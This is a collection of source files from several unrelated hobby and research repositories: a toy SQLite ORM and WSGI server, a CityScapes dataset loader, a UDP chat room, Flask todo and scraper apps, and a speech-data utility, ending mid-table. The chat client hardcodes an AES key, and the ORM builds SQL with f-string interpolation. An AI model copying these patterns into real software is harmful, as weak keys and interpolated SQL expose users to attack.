return self.model(**dict(zip(cols, row)))
def _row(self):
pass
def __contains__(self, value):
return value in self._set
def __iter__(self):
return iter(self._set)
def __len__(self):
return len(self._set)
def __str__(self):
return '<%s RecorcdSet (%s)>' % (self.model.__name__, ','.join(map(lambda x: str(x.pk), self._set)))
class Model(metaclass=ModelMetaclass):
""" Base class of all models mapping tables
Define all abstract methods interact with DB
"""
__abstract__ = True
objects = RecordSet()
def __init__(self, **kwargs):
for key, value in kwargs.items():
if key not in self.__mappings__:
raise AttributeError(f'{key} does not exist')
if not isinstance(value, self.__mappings__[key]._py_type):
raise TypeError(f'{key} type is error')
pk = NewId()
if 'pk' in kwargs:
pk = kwargs.pop('pk')
kwargs['_pk'] = pk
self.__dict__.update(**kwargs)
@property
def pk(self):
return self._pk
@classmethod
def create_table(cls):
""" Create a table in database
It will create all tables through all base class's subclass
"""
with DBConnect() as conn:
get_tables = f"""
SELECT NAME
FROM sqlite_master
WHERE type='table'
"""
tables = set(
map(lambda x: x[0], conn.execute(get_tables).fetchall())
)
for class_ in cls.__subclasses__():
if class_.__name__ in tables:
continue
cols = ','.join([f'{c.col_name} {c.col_type}'
for c in class_.__mappings__.values()])
conn.execute(f"CREATE TABLE {class_.__table__} ({cols})")
logger.info(f'Table {class_.__table__} created')
def _create(self):
""" Create record by instance of class """
cols = []
args = []
params = []
for k, v in self.__mappings__.items():
cols.append(v.col_name)
args.append(getattr(self, k))
params.append('?')
cols_str = ','.join(cols)
params_str = ','.join(params)
sql = f"""
INSERT INTO { self.__table__ } ({ cols_str })
VALUES ({ params_str })
"""
with DBConnect() as conn:
conn.execute(sql, tuple(args))
pk = conn.execute(f"""
select pk from {self.__table__} order by pk desc
""").fetchone()
self._pk = pk[0]
def delete(self):
sql = f"""
DELETE FROM { self.__table__ }
WHERE pk={self.pk}
"""
with DBConnect() as conn:
conn.execute(sql)
def save(self):
pk_value = self.pk
if pk_value:
self._update()
else:
self._create()
def _update(self):
cols = []
args = []
params = []
for k, v in self.__mappings__.items():
cols.append(v.col_name)
args.append(getattr(self, k))
params.append('?')
cols_str = ','.join([col+'=?' for col in cols])
sql = f"""
update { self.__table__ }
set { cols_str }
where pk={self.pk}
"""
with DBConnect() as conn:
conn.execute(sql, tuple(args))
def __getattr__(self, key):
if key not in self.__mappings__:
raise AttributeError(f"There's no attribute { key }")
def __setattr__(self, key, value):
super().__setattr__(key, value)
def __eq__(self, other):
return hash(self) == hash(other) and self.__dict__ == other.__dict__
def __hash__(self):
return self.pk
def __str__(self):
return '<%s:%s>' % ('Model', self.__class__.__name__)
def __repr__(self):
return '<%s:%s # pk=%s>' % ('Model', self.__class__.__name__, self.pk)
class Field:
""" Base class of Field class """
def __init__(self, col_name, col_type):
self.col_name = col_name
self.col_type = col_type
self._py_type = {
'TEXT': str,
'INT': int,
}.get(col_type, object)
class IntegerField(Field):
def __init__(self, col_name):
super().__init__(col_name, 'INT')
class TextField(Field):
def __init__(self, col_name):
super().__init__(col_name, 'TEXT')
class User(Model):
name = TextField('name')
age = IntegerField('age')
```
#### File: webgo/webgo/wsgiserver.py
```python
import os
import sys
import types
import logging
import argparse
from multiprocessing.pool import ThreadPool
from wsgiref.simple_server import WSGIServer, WSGIRequestHandler
from importlib.abc import Loader, MetaPathFinder
from importlib.util import spec_from_file_location
from webgo import config
from webgo import webgoapp
from webgo.template import get_abs_path
logger = logging.getLogger(__name__)
def serving(Application=webgoapp.Application):
PROJECT_PATH = parse_command_argument()
config.project = config.ProjectParse(PROJECT_PATH)
sys.meta_path.append(WebgoMetaPathFinder())
app = Application(config.project.pkg_name)
# Reload file if file modified
app = Reload(app, config.project.path)
logger.info(f'Serving {config.project.pkg_name} ... ')
run_server(app)
def run_server(app):
make_server('', 8080, app).serve_forever()
class TheadPoolWSGIServer(WSGIServer):
def __init__(self, workers, *args, **kwargs):
WSGIServer.__init__(self, *args, **kwargs)
self.workers = workers
self.pool = ThreadPool(self.workers)
def process_request(self, request, client_address):
self.pool.apply_async(
WSGIServer.process_request,
args=(self, request, client_address)
)
def make_server(
host,
port,
app,
handler_class=WSGIRequestHandler,
workers=8
):
httpd = TheadPoolWSGIServer(
workers=workers,
server_address=(host, port),
RequestHandlerClass=handler_class
)
httpd.set_app(app)
return httpd
class WebgoMetaPathFinder(MetaPathFinder):
def find_spec(self, fullname, path, target=None):
modname = config.project.pkg_name
location = os.path.join(config.project.path, '__init__.py')
if fullname == modname:
return spec_from_file_location(
name=modname,
location=location,
loader=WebgoLoader(),
submodule_search_locations=[config.project.path]
)
else:
return None
class WebgoLoader(Loader):
def create_module(self, spec):
return None
def exec_module(self, module):
with open(module.__file__) as f:
data = f.read()
exec(data, module.__dict__)
def module_repr(self, module):
return NotImplementedError
def parse_command_argument():
parser = argparse.ArgumentParser()
parser.add_argument('project', help='your project')
parser.add_argument('--migrate', help='migrate your model')
args = parser.parse_args()
# if args.migrate:
# The operation is somewhat funny!
# _load_module(get_abs_path(args.project))
# orm.Model.create_table(args.migrate)
# sys.exit()
return get_abs_path(args.project)
class Reload:
""" Module-reload Middleware """
def __init__(self, app, project_path):
self.app = app
self.project = project_path
self.mtime = os.path.getctime(project_path)
def __call__(self, environ, start_response):
mtime_now = os.path.getctime(self.project)
if mtime_now != self.mtime:
logger.info(f'Reloading {self.project} ... ')
self.app.__init__(config.project.pkg_name)
self.mtime = mtime_now
return self.app(environ, start_response)
``` |
{
"source": "1xyz/pytorch-fcn-ext",
"score": 2
} |
#### File: torchfcn/datasets/cityscape.py
```python
import collections
import os.path as osp
import sys
import PIL.Image
import numpy as np
import torch
from torch.utils import data
from .transforms import ImageTransformType, FlipType, apply_transform
class CityScape(data.Dataset):
class_names = np.array([
'ego vehicle',
'rectification border',
'out of roi',
'static',
'dynamic',
'ground',
'road',
'sidewalk',
'parking',
'rail track',
'building',
'wall',
'fence',
'guard rail',
'bridge',
'tunnel',
'pole',
'polegroup',
'traffic light',
'traffic sign',
'vegetation',
'terrain',
'sky',
'person',
'rider',
'car',
'truck',
'bus',
'caravan',
'trailer',
'train',
'motorcycle',
'bicycle',
'license plate'
])
mean_bgr = np.array([104.00698793, 116.66876762, 122.67891434])
train_flip_types = [FlipType.Unknown, FlipType.Vertical, FlipType.Horizontal]
train_transform_types = [
ImageTransformType.CenterCrop,
ImageTransformType.BottomRightCrop,
ImageTransformType.BottomLeftCrop,
ImageTransformType.TopRightCrop,
ImageTransformType.TopLeftCrop,
ImageTransformType.Resize
]
val_flip_types = [FlipType.Unknown]
val_transform_types = [
ImageTransformType.Resize
]
final_h = 256
final_w = 512
def __init__(self, root, split='train', transform=False):
self.root = root
self.split = split
self._transform = transform
dataset_dir = osp.join(self.root, 'CityScapes/CityScapes')
self.files = collections.defaultdict(list)
for split in ['train', 'val']:
imgsets_file = osp.join(
dataset_dir, 'CityScapes_%s.txt' % split)
for did in open(imgsets_file):
did = did.strip()
city = did.partition('_')[0]
img_file = osp.join(
dataset_dir,
"{0}/{1}/{2}/{3}_{0}.png".format("leftImg8bit", split, city, did))
lbl_file = osp.join(
dataset_dir,
"{0}/{1}/{2}/{3}_{0}_labelIds.png".format("gtFine", split, city, did))
if split == 'train':
for flip_type in self.train_flip_types:
for transform_type in self.train_transform_types:
self.files[split].append({
'img': img_file,
'lbl': lbl_file,
'flip_type': flip_type,
'transform_type': transform_type
})
else:
for flip_type in self.val_flip_types:
for transform_type in self.val_transform_types:
self.files[split].append({
'img': img_file,
'lbl': lbl_file,
'flip_type': flip_type,
'transform_type': transform_type
})
def __len__(self):
return len(self.files[self.split])
def __getitem__(self, index):
data_file = self.files[self.split][index]
img_file = data_file['img']
lbl_file = data_file['lbl']
flip_type = data_file['flip_type']
transform_type = data_file['transform_type']
with PIL.Image.open(img_file) as img, PIL.Image.open(lbl_file) as lbl:
try:
new_img, new_lbl = apply_transform(img, lbl, transform_type, flip_type, self.final_h, self.final_w)
new_img = np.array(new_img, dtype=np.uint8)
new_lbl = np.array(new_lbl, dtype=np.int32)
new_lbl[new_lbl == 255] = -1
except:
print("Unexpected error:", sys.exc_info()[0])
print(f"Current index {index} img_file: {img_file} type(image)={type(new_img)}")
print(f"Current index {index} lbl_file: {lbl_file} type(lbl)={type(new_lbl)}")
raise
if self._transform:
return self.transform(new_img, new_lbl)
else:
return new_img, new_lbl
def transform(self, img, lbl):
img = img[:, :, ::-1] # RGB -> BGR
img = img.astype(np.float64)
img -= self.mean_bgr
img = img.transpose(2, 0, 1)
img = torch.from_numpy(img).float()
lbl = torch.from_numpy(lbl).long()
return img, lbl
def untransform(self, img, lbl):
img = img.numpy()
img = img.transpose(1, 2, 0)
img += self.mean_bgr
img = img.astype(np.uint8)
img = img[:, :, ::-1]
lbl = lbl.numpy()
return img, lbl
``` |
{
"source": "1Ya1YaY0u/FininalProject",
"score": 3
} |
#### File: FininalProject/ChattingRoom/server.py
```python
import socket
import time
class Server(object):
def __init__(self):
self.hostIP = '127.0.0.1'
self.hostPort = 9999
def startServer(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # create socket object
s.bind((self.hostIP, self.hostPort))
chattingHistory = {} # key for clientAddr, value for chatting data
print("\033[0;32m Server on\033[0m\n")
clients = [] # records for all clients
while True:
recvData, clientAddr = s.recvfrom(1024) # recieve data
chattingRcd = time.ctime() + '\n' + recvData.decode('utf-8') + '\n'
if clients.count(clientAddr) == 0: # if this client is not recorded, then add it to list
clients.append(clientAddr)
chattingHistory[clientAddr] = chattingRcd # add data to history
else:
chattingHistory[clientAddr] += chattingRcd
# if recvData == sys.stdin(exit): # stop recieving data
if recvData == b'cmd -h': # search chatting history(what this client said)
print("Client {} request to search chatting history\n".format(clientAddr))
# tips = "\033[0;33mChatting history of client {}\033[0m\n".format(clientAddr).encode('utf-8')
tips = "Chatting history of client {}\n".format(clientAddr).encode('utf-8')
s.sendto(tips + chattingHistory[clientAddr].encode('utf-8'), clientAddr)
continue
showName = "Message From Client \'{0[0]}, {0[1]}\': \n".format(clientAddr)
print(' ' + showName + recvData.decode('utf-8')) # server is listening
for addr in clients: # forward data to all other clients
if addr != clientAddr:
s.sendto(showName.encode('utf-8') + recvData + b'\n', addr)
# s.sendto(recvData, addr)
s.close() # close socket
if __name__ == "__main__":
server = Server()
server.startServer()
```
#### File: FininalProject/ChattingRoom_wzk/client.py
```python
import socket
import threading
import tkinter as tk
from my_aes import PrpCrypt
class Client_wzk(object):
def __init__(self, mytop):
self.top = mytop
self.ip_entry = tk.Entry(self.top, width=80)
self.port_entry = tk.Entry(self.top, width=80)
self.passwd_entry = tk.Entry(self.top, width=80)
self.send_entry = tk.Entry(self.top, width=80)
self.recv_entry = tk.Text(self.top, width=80)
self.hostIP = '127.0.0.1'
self.hostPort = 9999
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.pc = PrpCrypt("keyskeyskeyskeys")
def startClient(self, ip, portNum):
# ip = self.ip_entry.get()
# portNum = int(self.port_entry.get())
# passwd = self.passwd_entry.get()
print("start client", ip, portNum)
# self.s.bind((ip, portNum))
# print(self.s)
print('\033[0;32m Client \'{}, {}\' on\nYou can now start chatting...\033[0m\n'.format(ip, portNum))
send_t = threading.Thread(target=self.send_thread, args=(self.s,)) # send thread
send_t.setDaemon(True)
send_t.start()
recv_t = threading.Thread(target=self.recv_thread, args=(self.s,)) # recv thread
recv_t.setDaemon(True)
recv_t.start()
def login(self):
ip = self.ip_entry.get()
portNum = self.port_entry.get()
self.s.bind((ip, int(portNum)))
# for i in range(5): # 5 times to input correct passwd
# portNum = int(self.port_entry.get())
passwd = self.passwd_entry.get()
loginInfo = '$login' + ip + "," + portNum + ":" + passwd
encrypt_data = self.pc.encrypt(loginInfo.encode('utf-8'))
self.s.sendto(encrypt_data, (self.hostIP, self.hostPort))
print(loginInfo)
resp, addr = self.s.recvfrom(1024) # response from server
if self.pc.decrypt(resp) == b"pass": # account and passwd ok, then start client
self.recv_entry.insert(0.0, "Login\n")
print("params", ip, portNum)
self.startClient(ip, int(portNum))
elif self.pc.decrypt(resp) == b"failed": # varifi failed, can try again, but not more than 5 times
# self.ip_entry.delete(0,20)
# self.port_entry.delete(0,20)
self.passwd_entry.delete(0, 20)
self.s.close() # need to improve
self.recv_entry.insert(0.0, "Wrong passwd for this account")
print("try again")
else: # unexpected resp
self.passwd_entry.delete(0, 20)
self.s.close()
self.recv_entry.insert(0.0, "Wrong passwd for this account")
print("error")
# break
def send_thread(self, socket):
print("send thread")
inputData = self.send_entry.get().encode('utf-8')
self.send_entry.delete(0, 100)
if inputData == b"exit": # exit client
# break
return
encrypt_data = self.pc.encrypt(inputData)
socket.sendto(encrypt_data, (self.hostIP, self.hostPort))
def recv_thread(self, socket):
while True:
recvData, recvAddr = socket.recvfrom(1024)
print("***recvdata", recvData)
decrypted_data = self.pc.decrypt(recvData)
print("***decdata", decrypted_data)
if recvAddr != (self.hostIP, self.hostPort): # discard data not from host
continue
self.recv_entry.insert(100.100, decrypted_data.decode('utf-8')) # blocked
def window(self):
self.top.title('Chatting Room by <NAME>')
tk.Label(self.top, text='Chatting Room by <NAME>')
tk.Label(self.top, text='IP').grid(row=1)
tk.Label(self.top, text='Port').grid(row=3)
tk.Label(self.top, text='Passwd').grid(row=5)
tk.Label(self.top, text='Send').grid(row=7)
tk.Label(self.top, text='Recv').grid(row=9)
self.ip_entry.grid(row=1, column=1)
self.port_entry.grid(row=3, column=1)
self.passwd_entry.grid(row=5, column=1)
self.send_entry.grid(row=7, column=1)
self.recv_entry.grid(row=9, column=1)
login = tk.Button(self.top, text='Login', bg='green',
command=self.login)
print("login btn")
sendData = tk.Button(self.top, text='Send', bg='green',
command=lambda: self.send_thread(self.s))
login.grid(row=5, column=2)
sendData.grid(row=7, column=2)
return 0
if __name__ == "__main__":
top = tk.Tk()
# top.geometry('800x500')
client = Client_wzk(top)
client.window()
top.mainloop()
# login btn not ended, maybe thread things
```
#### File: FininalProject/Spider/test.py
```python
from flask import Flask, request
import requests
from bs4 import BeautifulSoup
app = Flask(__name__)
@app.route('/')
def index():
# html = """
# <form>
# 姓名:
# <input type="text" name="myName">
# <br/>
# 密码:
# <input type="password" name="<PASSWORD>">
# </form>"""
html = """
<!DOCTYPE html>
<html>
<body>
<form action="/url" method="post">
URL:<br>
<input type="text" name="url" value="input url">
<br>
<input type="submit" value="Submit">
</form>
</body>
</html>
"""
return html
@app.route('/url', methods=["POST", "GET"])
def get_url():
url = request.form.get('url')
# print(url)
return url
def get_html(url):
"""get the content of the url"""
response = requests.get(url)
response.encoding = 'utf-8'
return response.text
# get content
def get_chapter_list(html):
"""get the joke of the html"""
print(html)
soup = BeautifulSoup(html, 'lxml')
# joke_content = soup.select('#contents')[0].get_text()
# head = soup.select('head')[0]
# print("head: \n", head)
# chapter_list = soup.find(class_='listmain')
# chapter_list = soup.find_all('a').get_text()
# href = [i.get('href') for i in chapter_list.find_all('a')]
# print(str(chapter_list))
# print(chapter_list)
# print("href", href)
# chapter_list = soup.select('.wrap')[0]
# print("chapter_list.name:", chapter_list.name)
content = soup.select('.showtxt')
print(content)
# return chapter_list
return content
if __name__ == '__main__':
# app.run(debug=True)
# url = "http://www.shuquge.com/txt/63542/index.html"
url = "http://www.shuquge.com/txt/8400/28344165.html"
html = get_html(url)
content = get_chapter_list(html)
``` |
{
"source": "1ytic/open_stt_e2e",
"score": 3
} |
#### File: 1ytic/open_stt_e2e/utterances.py
```python
import argparse
import numpy as np
from tqdm import tqdm
from os.path import join, isfile
from data import Labels
from joblib import Parallel, delayed
labels = Labels()
def job(text_path, numpy_path):
with open(text_path, 'r', encoding='utf8') as file:
text = file.read()
if not labels.is_accepted(text):
return None
required_frames = labels.required_frames(text)
actual_frames = len(np.load(numpy_path))
if required_frames > actual_frames:
return None
return '%s,%d,%s' % (numpy_path, actual_frames, text)
parser = argparse.ArgumentParser(description='Collect utterances')
parser.add_argument('--manifest', type=str)
parser.add_argument('--jobs', type=int, default=8)
args = parser.parse_args()
prefix = args.manifest.replace('.csv', '')
print(prefix)
files = dict()
with open(args.manifest) as f:
progress = tqdm(f.readlines())
for line in progress:
path = line.split(',')[0]
text_path = join(prefix, path.replace('.wav', '.txt'))
if not isfile(text_path):
continue
numpy_path = join(prefix, path.replace('.wav', '.npy'))
if not isfile(numpy_path):
continue
files[text_path] = numpy_path
tasks = []
for text_path, numpy_path in files.items():
tasks.append(delayed(job)(text_path, numpy_path))
print('Tasks:', len(tasks))
results = Parallel(n_jobs=args.jobs, backend='multiprocessing', verbose=1)(tasks)
utterances = sorted([r for r in results if r is not None])
print('Success:', len(utterances))
with open(prefix + '.txt', 'w', encoding='utf8') as file:
file.write('path,frames,text\n')
file.writelines(utterances)
``` |
{
"source": "1ytic/pytorch-edit-distance",
"score": 2
} |
#### File: pytorch-edit-distance/torch_edit_distance/__init__.py
```python
import torch
import torch_edit_distance_cuda as core
from pkg_resources import get_distribution
__version__ = get_distribution('torch_edit_distance').version
def collapse_repeated(
sequences, # type: torch.Tensor
lengths # type: torch.IntTensor
):
"""Merge repeated tokens.
Sequences and lengths tensors will be modified inplace.
Args:
sequences (torch.Tensor): Tensor (N, T) where T is the maximum
length of tokens from N sequences.
lengths (torch.IntTensor): Tensor (N,) representing the
number of tokens for each sequence.
"""
core.collapse_repeated(sequences, lengths)
def remove_blank(
sequences, # type: torch.Tensor
lengths, # type: torch.IntTensor
blank # type: torch.Tensor
):
"""Remove tokens.
Sequences and lengths tensors will be modified inplace.
Args:
sequences (torch.Tensor): Tensor (N, T) where T is the maximum
length of tokens from N sequences.
lengths (torch.IntTensor): Tensor (N,) representing the
number of tokens for each sequence.
blank (torch.Tensor): A set of tokens to remove.
"""
core.remove_blank(sequences, lengths, blank)
def strip_separator(
sequences, # type: torch.Tensor
lengths, # type: torch.IntTensor
separator # type: torch.Tensor
):
"""Remove tokens.
Sequences and lengths tensors will be modified inplace.
Args:
sequences (torch.Tensor): Tensor (N, T) where T is the maximum
length of tokens from N sequences.
lengths (torch.IntTensor): Tensor (N,) representing the
number of tokens for each sequence.
separator (torch.Tensor): A set of tokens to remove as
leading/trailing tokens as well as repeated middle tokens.
"""
core.strip_separator(sequences, lengths, separator)
def levenshtein_distance(
hypotheses, # type: torch.Tensor
references, # type: torch.Tensor
hypothesis_lengths, # type: torch.IntTensor
references_lengths, # type: torch.IntTensor
blank, # type: torch.Tensor
separator # type: torch.Tensor
):
"""Levenshtein edit-distance for separated words or independent tokens.
Return torch.ShortTensor (N, 4) with detail ins/del/sub/len statistics.
Args:
hypotheses (torch.Tensor): Tensor (N, H) where H is the maximum
length of tokens from N hypotheses.
references (torch.Tensor): Tensor (N, R) where R is the maximum
length of tokens from N references.
hypothesis_lengths (torch.IntTensor): Tensor (N,) representing the
number of tokens for each hypothesis.
references_lengths (torch.IntTensor): Tensor (N,) representing the
number of tokens for each reference.
blank (torch.Tensor): tokens used to represent the blank symbol.
separator (torch.Tensor): tokens used to represent the separator symbol.
"""
assert hypotheses.dim() == 2
assert references.dim() == 2
assert hypothesis_lengths.dim() == 1
assert references_lengths.dim() == 1
assert hypotheses.size(0) == hypothesis_lengths.numel()
assert references.size(0) == references_lengths.numel()
assert hypothesis_lengths.numel() == references_lengths.numel()
return core.levenshtein_distance(hypotheses, references,
hypothesis_lengths, references_lengths,
blank, separator)
def compute_wer(hs, rs, hn, rn, blank, space):
data = levenshtein_distance(hs, rs, hn, rn, blank, space).float()
wer = data[:, :3].sum(dim=1) / data[:, 3]
return wer
class AverageWER(object):
def __init__(self, blank, space, title='WER', detail=2):
self.blank = blank
self.space = space
self.title = title
self.detail = detail
self.data = 0
def update(self, hs, rs, hn, rn):
data = levenshtein_distance(hs, rs, hn, rn, self.blank, self.space)
self.data += data.sum(dim=0).float()
def values(self):
_ins = self.data[0]
_del = self.data[1]
_sub = self.data[2]
_len = self.data[3]
_err = (_ins + _del + _sub) / _len * 100
if self.detail == 2:
_ins = _ins / _len * 100
_del = _del / _len * 100
_sub = _sub / _len * 100
return _err, _ins, _del, _sub
def summary(self, writer, epoch):
_err, _ins, _del, _sub = self.values()
if self.detail > 0:
writer.add_scalar(self.title + '/insertions', _ins, epoch)
writer.add_scalar(self.title + '/deletions', _del, epoch)
writer.add_scalar(self.title + '/substitutions', _sub, epoch)
writer.add_scalar(self.title, _err, epoch)
def __str__(self):
_err, _ins, _del, _sub = self.values()
info = '%s %.1f' % (self.title, _err)
if self.detail == 1:
info += ' [ %d ins, %d del, %d sub ]' % (_ins, _del, _sub)
elif self.detail == 2:
info += ' [ %.1f ins, %.1f del, %.1f sub ]' % (_ins, _del, _sub)
return info
class AverageCER(AverageWER):
def __init__(self, blank, space, title='CER', detail=2):
blank = torch.cat([blank, space])
space = torch.empty([], dtype=space.dtype, device=space.device)
super(AverageCER, self).__init__(blank, space, title, detail)
``` |
{
"source": "1Zarkos1/flask_todo_list",
"score": 2
} |
#### File: flask_todo_list/tests/test_main.py
```python
from datetime import timedelta, datetime
import pytest
from wtforms.validators import ValidationError
from flask_wtf.csrf import generate_csrf
from flask_login import current_user
from todo import TaskForm, RegistrationForm, LoginForm, User, db, Task
VALID_DUE_DATE = datetime.now() + timedelta(days=1)
def test_index_page(client):
resp = client.get("/")
assert resp.status_code == 200
assert "Create new task" in resp.data.decode("utf-8")
def test_task_addition(client):
resp = client.post(
"/",
data={
"title": "Test title",
"description": "Test description",
"date_due": VALID_DUE_DATE.strftime("%Y-%m-%dT%H:%M"),
},
follow_redirects=True,
)
assert len(Task.query.all()) == 1
assert b"Test title" in resp.data
assert b"Test description" in resp.data
@pytest.mark.parametrize(
"title,date_due,description",
[
("", VALID_DUE_DATE, "test descrition"),
("test title", "", "test description"),
("test title", VALID_DUE_DATE, ""),
("test title", "random", "test"),
],
)
def test_task_form_validation_on_missing_value(app_inst, title, date_due, description):
with app_inst.test_request_context(
method="POST",
data={"title": title, "date_due": date_due, "description": description},
):
form = TaskForm()
assert form.validate_on_submit() == False
@pytest.mark.parametrize(
"date_due",
[VALID_DUE_DATE, 2222, VALID_DUE_DATE.strftime("%Y-%m-%d"), "random string"],
)
def test_incorrect_date_due_format(client, date_due):
resp = client.post(
"/",
data={
"title": "Test title",
"description": "Test description",
"date_due": date_due,
},
follow_redirects=True,
)
assert resp.status_code == 200
assert b"Not a valid datetime value" in resp.data
def test_correct_registration_form(app_inst):
with app_inst.test_request_context():
form = RegistrationForm(
email="<EMAIL>", password="<PASSWORD>", pass_repeat="<PASSWORD>"
)
assert form.validate() == True
@pytest.mark.parametrize(
"email,password,error",
[
("<EMAIL>", "fizz", "pass_repeat"),
("something_mail.com", "test", "email"),
],
)
def test_incorrect_data_in_registration_form(app_inst, email, password, error):
with app_inst.test_request_context():
form = RegistrationForm(email=email, password="<PASSWORD>", pass_repeat=password)
assert form.validate() == False
assert len(form.errors) == 1
assert error in form.errors
def test_user_already_exists_in_registration_form(app_inst):
db.session.add(User(email="<EMAIL>", password="<PASSWORD>"))
db.session.commit()
with app_inst.test_request_context():
form = RegistrationForm(
email="<EMAIL>", password="<PASSWORD>", pass_repeat="<PASSWORD>"
)
assert form.validate() == False
assert len(form.errors) == 1
assert "User with this email already exist" in form.errors["email"]
def test_user_registration(app_inst, client):
resp = client.post(
"/register/",
data={
"email": "<EMAIL>",
"password": "<PASSWORD>",
"pass_repeat": "test",
},
follow_redirects=True,
)
users = User.query.all()
user = users[0]
assert len(users) == 1
assert user.email == "<EMAIL>"
def test_user_login(app_inst, client):
with app_inst.test_request_context():
user = User(email="<EMAIL>", password="<PASSWORD>")
db.session.add(user)
db.session.commit()
resp = client.post(
"/",
data={
"email": "<EMAIL>",
"password": "<PASSWORD>",
},
follow_redirects=True,
)
assert b"<EMAIL>" in resp.data
assert b"Log Out" in resp.data
```
#### File: 1Zarkos1/flask_todo_list/todo.py
```python
from datetime import datetime
import bcrypt
from flask import Flask, redirect, render_template, request, url_for, jsonify, flash
from flask_sqlalchemy import SQLAlchemy
from flask_login import UserMixin, LoginManager, login_user, current_user, logout_user
from flask_wtf import FlaskForm
from flask_wtf.csrf import CSRFProtect
from wtforms import (
StringField,
TextAreaField,
HiddenField,
IntegerField,
PasswordField,
SubmitField,
)
from wtforms.fields.html5 import DateTimeLocalField, EmailField
from wtforms.validators import DataRequired, ValidationError, Email, EqualTo
app = Flask(__name__, static_folder="./assets")
app.config.from_object("config.DevConfig")
app.jinja_options["trim_blocks"] = True
app.jinja_options["lstrip_blocks"] = True
db = SQLAlchemy(app)
login = LoginManager(app)
# csrf = CSRFProtect(app)
class User(UserMixin, db.Model):
__tablename__ = "user"
email = db.Column(db.String, primary_key=True)
_password = db.Column(db.String)
tasks = db.relationship("Task", backref="author", cascade="delete, delete-orphan")
def get_id(self):
return self.email
@property
def password(self):
return self._password
@password.setter
def password(self, plain_pass):
self._password = bcrypt.hashpw(plain_pass.encode("utf-8"), bcrypt.gensalt())
def check_password(self, password):
return bcrypt.checkpw(password.encode("utf-8"), self._password)
@login.user_loader
def loader(email):
return User.query.get(email)
class Task(db.Model):
__tablename__ = "task"
id = db.Column(db.Integer, primary_key=True)
author_email = db.Column(db.String, db.ForeignKey("user.email"), index=True)
title = db.Column(db.String)
date_created = db.Column(db.DateTime, default=datetime.now())
date_due = db.Column(db.DateTime)
date_completed = db.Column(db.DateTime)
description = db.Column(db.String)
def __repr__(self):
return f"<Task - №{self.id}>"
class RegistrationForm(FlaskForm):
email = EmailField("Email", validators=[Email()])
password = PasswordField("Password")
pass_repeat = PasswordField("Repeat password", validators=[EqualTo("password")])
submit = SubmitField("Register")
def validate_email(self, email):
if User.query.filter_by(email=email.data).first():
raise ValidationError("User with this email already exist")
class LoginForm(FlaskForm):
email = EmailField("Email", validators=[Email()])
password = PasswordField("Password")
submit = SubmitField("Login")
class TaskForm(FlaskForm):
title = StringField("Title", validators=[DataRequired()])
date_due = DateTimeLocalField("Date due", format="%Y-%m-%dT%H:%M")
description = TextAreaField("Description", validators=[DataRequired()])
hidden_id = HiddenField()
submit = SubmitField("Add task")
def validate_date_due(self, date_due):
if date_due.data is None:
raise ValidationError(
'This field is required with the following \
format "year-month-dayThour:minute"'
)
if date_due.data < datetime.now():
raise ValidationError("Due time must be in the future.")
@app.route("/", methods=["GET", "POST"])
def show_tasks():
form = TaskForm()
log_form = LoginForm()
if "password" in request.form:
if log_form.validate_on_submit():
user = User.query.get(log_form.email.data)
if user.check_password(log_form.password.data):
login_user(user)
return redirect("/")
else:
if form.validate_on_submit():
if _id := form.hidden_id.data:
t = Task.query.get(int(_id))
else:
t = Task()
t.author = current_user if current_user.is_authenticated else None
db.session.add(t)
form.populate_obj(t)
db.session.commit()
return redirect("/")
filt = current_user.email if current_user.is_authenticated else None
result = (
Task.query.filter_by(author_email=filt)
.order_by(Task.date_completed.asc(), Task.date_due.desc())
.all()
)
return render_template("index.html", result=result, form=form, log_form=log_form)
@app.route("/get_tasks/", methods=["POST"])
def get_tasks():
email_filter = current_user.email if current_user.is_authenticated else None
if request.get_json():
tasks = Task.query.filter(Task.date_completed == None).filter(
Task.date_due > datetime.now()
)
else:
tasks = Task.query
tasks = (
tasks.filter_by(author_email=email_filter)
.order_by(Task.date_completed.asc(), Task.date_due.desc())
.all()
)
return render_template("_todos.html", result=tasks)
@app.route("/register/", methods=["POST", "GET"])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User()
form.populate_obj(user)
db.session.add(user)
db.session.commit()
return redirect(url_for("show_tasks"))
return render_template("register.html", form=form)
@app.route("/profile/<user>")
def profile(user):
pass
@app.route("/logout/")
def logout():
logout_user()
return redirect("/")
@app.route("/complete-task/<int:id>")
def complete_task(id):
Task.query.get(id).date_completed = datetime.now()
db.session.commit()
return jsonify(True)
@app.route("/delete-task/<int:id>")
def delete_task(id):
db.session.delete(Task.query.get(id))
db.session.commit()
return jsonify(True)
@app.template_filter()
def time(date_obj):
return date_obj.strftime("%Y-%m-%d %H:%M:%S")
@app.template_filter()
def interval(interval_obj):
return str(interval_obj).split(".")[0]
@app.context_processor
def set_required_variables():
return dict(now=datetime.now())
``` |
{
"source": "1Zero64/IndAna",
"score": 3
} |
#### File: DataGenerators/Configuration/Season.py
```python
def getSeason(date, articleId):
'''
calculates and returns the season weight for a article
:param date: (date)
date to get the article seasonality
articleId: (int)
identifier of the article to get the article seasonality and article weight
:return:
articleSeasonWeight: (float)
season weight for a article
'''
articleSeasonWeight = ((articleSeasonality[articleId][date.month-1]-1) * articleWeight[articleId])
return articleSeasonWeight
# Seasonality weight for a product for each month
articleSeasonality = {
1: [1.5, 1.2, 1.0, 1.0, 1.0, 1.0, 1.0, 1.4, 1.7, 2.0, 1.6, 1.9], # Apfel
2: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0], # Milch
3: [1.0, 1.0, 1.0, 1.4, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.4], # Klopapier
4: [1.0, 1.0, 1.0, 1.5, 1.2, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.4], # Salmon
5: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.6], # T-Bone steak
6: [1.7, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.8, 3.0], # Ginger Bread
7: [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.1, 1.2, 1.4], # Berliner (Doughnut)
8: [1.0, 1.0, 1.0, 1.4, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.4], # Egg
